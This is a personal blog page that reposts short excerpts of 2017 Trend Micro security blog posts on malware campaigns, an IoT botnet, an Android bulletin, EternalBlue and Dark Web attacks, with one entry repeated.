Martijn Lammerts
My own digital place with a little of everything

Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan

9 June 2017

We found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse’s pointer over a hyperlinked picture or text in a PowerPoint slideshow. This technique is employed by a Trojan downloader (detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A), which we’ve uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden. Affected industries include manufacturing, device fabrication, education, logistics, and pyrotechnics.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan

Continue reading...

Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan

9 June 2017

We found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse’s pointer over a hyperlinked picture or text in a PowerPoint slideshow. This technique is employed by a Trojan downloader (detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A), which we’ve uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden. Affected industries include manufacturing, device fabrication, education, logistics, and pyrotechnics.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Mouse Over, Macro: Spam Run in Europe Uses Hover Action to Deliver Banking Trojan

Continue reading...

The Reigning King of IP Camera Botnets and its Challengers

8 June 2017

Early this month we discussed a new Internet of Things (IoT) botnet called Persirai (detected by Trend Micro as ELF_PERSIRAI.A), which targets over 1000 Internet Protocol (IP) camera models. Currently, through Shodan and our own research, we see that 64% of tracked IP cameras with custom http servers are infected with Persirai. But, because these cameras are such common targets, there is some competition between malware.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

The Reigning King of IP Camera Botnets and its Challengers

Continue reading...

June’s Android Security Bulletin Address Critical Vulnerabilities in Media Framework and Qualcomm Components

8 June 2017

Google recently released their June security bulletin for Android, which addresses critical vulnerabilities found in Media framework, as well as various critical vulnerabilities that are based on Qualcomm components. As with previous Android security updates, this month’s bulletin is available via over-the-air updates for native Android devices or via service providers and manufacturers for non-native devices.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

June’s Android Security Bulletin Address Critical Vulnerabilities in Media Framework and Qualcomm Components

Continue reading...

Victim Machine has joined #general: Using Third-Party APIs as C&C Infrastructure

6 June 2017

Imagine a well-experienced security analyst at a major company going through his normal routine of checking logs at the end of the workday. A quick look at the company’s security solution logs reveal nothing too peculiar or alarming — except for one thing: a higher than normal amount of traffic to the office’s newly introduced third-party chat platform.

He doesn’t give this much thought. After all, the company’s been pushing to have the chat platform as the main office communication tool, so it makes sense that there’d be more traffic than usual.  The security analyst calls it a day and goes home.

One the way home, however, he gets an alert: The security scanner has detected a potential security issue. He returns to the office, and finds what appears to be the cause: A machine was flagged downloading known malicious files, which were then caught by the company’s security solution. Again, nothing too strange, but he decides to investigate just what triggered the malicious behavior.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Victim Machine has joined #general: Using Third-Party APIs as C&C Infrastructure

Continue reading...

MS-17-010: EternalBlue’s Large Non-Paged Pool Overflow in SRV Driver

2 June 2017

The EternalBlue exploit took the spotlight this month as it became the tie that bound the spate of malware attacks these past few weeks—the pervasive WannaCry, the fileless ransomware UIWIX, the Server Message Block (SMB) worm EternalRocks, and the cryptocurrency mining malware Adylkuzz.

EternalBlue (patched by Microsoft via MS17-010) is a security flaw related to how a Windows SMB 1.0 (SMBv1) server handles certain requests. If successfully exploited, it can allow attackers to execute arbitrary code in the target system. The severity and complexity of EternalBlue, alongside the other exploits released by hacking group Shadow Brokers, can be considered medium to high.

We further delved into EternalBlue’s inner workings to better understand how the exploit works and provide technical insight on the exploit that wreaked havoc among organizations across various industries around the world.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

MS-17-010: EternalBlue’s Large Non-Paged Pool Overflow in SRV Driver

Continue reading...

Red on Red: The Attack Landscape of the Dark Web

30 May 2017

We’ve frequently talked about how limited-access networks such as the Dark Web is home to various cybercriminal underground hotspots. Hosted and accessed via the Tor network, these sites house underground marketplaces that sell various good and services, which include cryptocurrency laundering, hosting platforms for malware, and stolen/counterfeit identities.

What is less covered is the attack landscape within the Dark Web. Are these sites subject to their own hacking attempts and DDoS attacks? What are the sizes and characteristics of attacks within the Dark Web? This is what we have learned: these attacks are surprisingly common within the Dark Web, and are frequently carried out manually and aimed at subverting or spying on the services run by other cybercriminals.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Red on Red: The Attack Landscape of the Dark Web

Continue reading...

Yara Used to RickRoll Security Researchers

26 May 2017

For most security researchers, Yara, a tool that allows them to create their own set of rules for malware tracking, is an invaluable resource that helps automate many processes. However, despite Yara’s reliability, it shouldn’t be the only tool used to monitor new versions of malware.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Yara Used to RickRoll Security Researchers

Continue reading...